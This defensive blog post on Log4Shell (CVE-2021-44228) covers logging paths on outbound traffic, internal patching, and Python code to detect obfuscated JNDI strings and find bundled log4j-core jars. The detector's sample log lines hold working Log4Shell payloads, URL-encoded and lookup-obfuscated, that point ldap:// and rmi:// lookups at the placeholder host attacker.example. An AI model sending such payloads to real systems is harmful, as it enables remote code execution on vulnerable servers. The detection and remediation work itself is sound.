Log4Shell and LogJam are both names used for a Log4j vulnerability (LogJam is the less helpful of the two, since it was already the name of a 2015 TLS vulnerability).
Log4j is a logging library for Java. The fix was committed on 2021-12-06 and widespread exploitation followed from 2021-12-10 as news of the vulnerability travelled (so, by that timeline, not a zero-day, although Cloudflare and Cisco Talos both reported seeing exploitation attempts from the start of December, before the fix was public).
The vulnerability, assigned CVE-2021-44228, is far-reaching because Log4j is a very popular logging library and Java is everywhere.
I highly recommend checking out Microsoft’s blog post, particularly the succinct list of workarounds if you can’t patch.
So, while externally-facing infrastructure is the obvious first place to investigate and remediate, don't overlook what an attacker can reach through traffic leaving your network.
There are many devices and client applications that users and systems interact with as their connections traverse and exit your network. Consider proxies, mail gateways, and security tooling.
Imagine a phishing email containing the following link 1:
It’s Google, right? It’s fine. Except that the entire URL, JNDI string included, could be logged by a host-based web monitoring tool (anti-virus or similar), logged by the proxy it passes through on the way out, or logged again when the proxy or host-based tool forwards its logs to the security information and event management (SIEM) tool. Whichever of those components writes that log line through a vulnerable Log4j will evaluate the lookup.
Filenames of files and attachments could get logged to a system, either directly through the operating system or through host-based monitoring (although, I would be quite surprised if something decided to URL decode a filename before logging).
Redirected URLs or chained cross-site scripting (XSS) could lead to a malicious URL being visited and, again, picked up by host or network monitoring.
For example, https://olliejc.uk/web-testing?test=9ced-1bdade435376 redirects to a URL containing a Log4Shell string.
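The detection side of the point above (a URL-encoded or lookup-obfuscated JNDI string hiding in an otherwise innocent-looking URL that a proxy, endpoint agent or SIEM will log) and the URL-decoding step from the footnote can be shown in one place. The following is an added example written for this post, not code from the original article or from the Log4j project; the log lines are constructed, the `attacker.example` host is a placeholder, and the de-obfuscation only models the three `${...}` behaviours attackers actually leaned on (`lower`/`upper` and the `:-` default-value syntax) rather than the full Log4j lookup engine.

```python
import re
from urllib.parse import unquote

# Constructed sample proxy log lines (not from any real incident). Lines 1-3
# carry a URL-encoded, a ${lower:...}-obfuscated and a ${::-x}-obfuscated
# JNDI string respectively; line 4 is a benign search.
SAMPLE_LOG_LINES = [
    'user1 GET https://www.google.com/search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D 200',
    'user2 GET https://example.org/?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} 200',
    'user3 GET https://example.org/?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c} 200',
    'user4 GET https://www.google.com/search?q=log4j+patch 200',
]

# Innermost ${...} only: the body contains no further '$', '{' or '}', which is
# the order Log4j's substitutor resolves nested lookups in.
_INNER = re.compile(r'\$\{([^${}]*)\}')
JNDI = re.compile(r'\$\{jndi:', re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Collapse the lookups attackers use to hide the literal 'jndi':
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-default} / ${::-default}
    -> default. Anything else (including a real ${jndi:...}) is re-wrapped
    unchanged so that it survives for detection."""
    if body.startswith('lower:'):
        return body[len('lower:'):].lower()
    if body.startswith('upper:'):
        return body[len('upper:'):].upper()
    if ':-' in body and not body.startswith('jndi:'):
        return body.split(':-', 1)[1]
    return '${' + body + '}'


def normalise(value: str, max_rounds: int = 10) -> str:
    """URL-decode until stable (handles double encoding), then resolve
    obfuscating lookups from the inside out. Both loops are bounded so a
    crafted string cannot keep the detector busy forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), value)
        if new == value:
            break
        value = new
    return value


def find_log4shell(lines):
    """Return (line_number, normalised_line) for each line that contains a
    JNDI lookup once decoding and de-obfuscation have been applied."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == '__main__':
    for n, norm in find_log4shell(SAMPLE_LOG_LINES):
        print(f'line {n}: {norm}')
```

Run against the sample lines this flags lines 1 to 3 and leaves the genuine Google search alone; the same `normalise` step is what you would apply to URL, filename and `User-Agent` fields before searching for `${jndi:` in a SIEM, because matching on the raw, still-encoded field misses the first and second variants entirely.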
Do not discount your internal network, infrastructure and services.
As soon as you’re reasonably confident you’ve patched and mitigated your public components, or while you’re waiting on suppliers and vendors, get started on applying updates and patches to all your internal software.
To help discover what your supply chain is saying, there’s a great resource of vendor and provider bulletins being curated by @SwitHak on GitHub:
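Before you can patch internal software you need to know where log4j-core is hiding, and it is frequently bundled inside WARs and fat jars rather than sitting loose on disk. This is an added example, not a tool from the original post: it walks a directory, looks inside every archive (recursing into archives nested within archives) for the `JndiLookup.class` entry that log4j-core 2.x ships, and reads the bundled `pom.properties` for the version. The sample directory it builds is constructed for the example and contains marker entries only, not real class files.

```python
import io
import os
import tempfile
import zipfile

# Real entry paths inside log4j-core 2.x jars.
JNDI_LOOKUP = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
POM_PROPS = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
ARCHIVE_EXT = ('.jar', '.war', '.ear', '.zip')


def _version_from_pom(zf):
    """Return the version= value from log4j-core's pom.properties, or None."""
    try:
        data = zf.read(POM_PROPS).decode('utf-8', 'replace')
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith('version='):
            return line.split('=', 1)[1].strip()
    return None


def _inspect(zf, label, findings):
    """Record log4j-core in this archive, then recurse into any archive
    nested inside it (WEB-INF/lib in a WAR, jars inside a fat jar)."""
    names = set(zf.namelist())
    if JNDI_LOOKUP in names:
        findings.append((label, _version_from_pom(zf)))
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _inspect(inner, f'{label}!{name}', findings)


def scan(root):
    """Walk root and return [(location, version_or_None)] for every archive,
    nested ones included, that contains JndiLookup.class."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            try:
                with zipfile.ZipFile(path) as zf:
                    _inspect(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree():
    """Construct a throwaway directory for the example: a log4j-core 2.14.1
    jar, a WAR bundling that jar under WEB-INF/lib, and a harmless jar.
    Entries are empty markers, not real bytecode."""
    root = tempfile.mkdtemp(prefix='log4j-scan-')

    def make(path, entries):
        with zipfile.ZipFile(path, 'w') as zf:
            for name, data in entries.items():
                zf.writestr(name, data)

    core = os.path.join(root, 'log4j-core-2.14.1.jar')
    make(core, {JNDI_LOOKUP: b'', POM_PROPS: b'version=2.14.1\n'})
    with open(core, 'rb') as fh:
        core_bytes = fh.read()
    make(os.path.join(root, 'app.war'),
         {'WEB-INF/lib/log4j-core-2.14.1.jar': core_bytes})
    make(os.path.join(root, 'clean.jar'), {'com/example/Main.class': b''})
    return root


if __name__ == '__main__':
    for location, version in scan(build_sample_tree()):
        print(f'{location}: log4j-core {version or "unknown version"}')
```

Point `scan()` at an application server's install directory rather than the sample tree to use it for real. Treat the version as the deciding field and the class presence as the "look here" signal: 2.16.0 and later still ship `JndiLookup.class` even though the dangerous message lookups are gone, and a copy with no `pom.properties` (repackaged or shaded) needs a manual check.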
Thanks for reading!
1 To save you the hassle of running that string through CyberChef, it URL decodes to:
Which in turn would get expanded to the following on a vulnerable component: